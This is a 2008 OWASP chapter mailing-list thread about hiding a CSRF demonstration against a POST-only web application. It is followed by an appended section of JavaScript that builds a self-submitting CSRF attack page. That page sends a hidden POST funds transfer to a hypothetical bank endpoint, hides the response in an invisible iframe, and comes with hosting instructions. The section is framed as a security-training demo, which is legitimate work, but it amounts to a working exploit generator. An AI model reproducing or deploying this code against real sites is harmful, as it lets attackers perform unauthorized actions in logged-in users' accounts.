[Owasp-cincinnati] Demonstrate CSRF with Web app only accept POST

Marco M. Morana marco.m.morana at gmail.com
Fri Jun 20 18:29:10 EDT 2008


Correct, since the request is forged in a 1x1 pixel image tag that causes no
visible error to the user.

Marco

-----Original Message-----
From: owasp-cincinnati-bounces at lists.owasp.org
[mailto:owasp-cincinnati-bounces at lists.owasp.org] On Behalf Of Joe Combs
Sent: Friday, June 20, 2008 5:45 PM
To: Zhou, Yan; owasp-cincinnati at lists.owasp.org
Subject: Re: [Owasp-cincinnati] Demonstrate CSRF with Web app only accept POST

If you borrow a technique from the ajax crowd and do your submit in 
javascript via XMLHttpRequest you should get the desired behavior in 
your demo. The app could then silently swallow the result returned by 
the form submission.

Joe

Zhou, Yan wrote:
>
> Hi there,
>
> I want to demonstrate CSRF with a vulnerable Web application.
>
> Here is the idea: the user first logs in to the vulnerable web app (it 
> only accepts POST), and then the user will click on an "attack" web 
> page, which does an automatic form submit. That completes the CSRF 
> exercise. However, once the form is submitted, the user will notice 
> that, because the screen will have changed.
>
> How would you hide this so that the user cannot see the result of the form 
> submit? I have tried a page redirect but it is not working as I expected. 
> The problem seems to be: once the form is submitted, I cannot rely on 
> any code after it being executed (simply because the server will now 
> respond with a different page).
>
> Thanks,
>
> Yan
>
_______________________________________________
Owasp-cincinnati mailing list
Owasp-cincinnati at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-cincinnati
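The hidden-submission technique discussed in this thread, as an added example (this is not code from the thread, from the list members, or from OWASP): the "attack" page carries a POST form whose target is an invisible iframe, and a one-line script submits it on load. The victim application's response lands in the iframe, so the visible page never changes, which is exactly the behaviour Yan was trying to get. The victim URL (https://bank.example/transfer), the parameter names and the values are hypothetical, constructed for the demo. Two caveats a practitioner would want here: an <img> tag can only issue GET requests, so on its own it cannot drive a POST-only endpoint, and an XMLHttpRequest from the attacker's page is a cross-origin request governed by the same-origin policy (and, in current browsers, CORS), so the form-plus-iframe page is the more reliable way to demonstrate a silent POST.

```javascript
// Added example, not part of the mailing-list thread: generates a CSRF
// proof-of-concept page that POSTs to a victim endpoint without the
// victim's visible page changing. All endpoint names and fields are
// hypothetical.

// Escape a value for safe placement inside a double-quoted HTML attribute,
// so attacker-controlled field values cannot break out of the input tag.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build the attack page: a POST form aimed at `action` whose response is
// swallowed by a zero-size, invisible iframe named `sinkName`. The inline
// script submits the form as soon as the page is parsed.
function buildCsrfPage(action, fields, sinkName = 'csrf_sink') {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtmlAttr(name)}" value="${escapeHtmlAttr(value)}">`)
    .join('\n');
  return [
    '<!DOCTYPE html>',
    '<html><body>',
    '  <h1>Nothing to see here</h1>',
    `  <iframe name="${escapeHtmlAttr(sinkName)}" style="width:0;height:0;border:0;visibility:hidden"></iframe>`,
    `  <form id="csrf" method="POST" action="${escapeHtmlAttr(action)}" target="${escapeHtmlAttr(sinkName)}">`,
    inputs,
    '  </form>',
    '  <script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
    '',
  ].join('\n');
}

// Sanity check on a generated page: the form is a POST, it targets the
// hidden frame, the frame exists, every field is present as a hidden input,
// and the page auto-submits. `sinkName` is used literally in a regex, so it
// should stay a plain identifier (as the default is).
function looksLikeHiddenPost(html, fields, sinkName = 'csrf_sink') {
  const postsToSink = new RegExp(`<form[^>]*method="POST"[^>]*target="${sinkName}"`).test(html);
  const sinkExists = new RegExp(`<iframe name="${sinkName}"`).test(html);
  const allFields = Object.keys(fields)
    .every((n) => html.includes(`name="${escapeHtmlAttr(n)}"`));
  return postsToSink && sinkExists && allFields && html.includes('.submit()');
}

// Constructed demo input: a hypothetical funds-transfer endpoint. The memo
// value deliberately contains quotes to show that attribute escaping holds.
const DEMO_FIELDS = {
  to: 'attacker-account',
  amount: '1000',
  memo: 'x" onload="alert(1)',
};

function demo() {
  const page = buildCsrfPage('https://bank.example/transfer', DEMO_FIELDS);
  return { page, ok: looksLikeHiddenPost(page, DEMO_FIELDS) };
}

if (typeof require !== 'undefined' && require.main === module) {
  process.stdout.write(demo().page);
}
```

Save the output as an HTML file on the "attacker" site and have the logged-in test user open it; the browser sends the POST with the victim application's cookies, and the server's response (redirect or results page) is rendered only inside the invisible iframe.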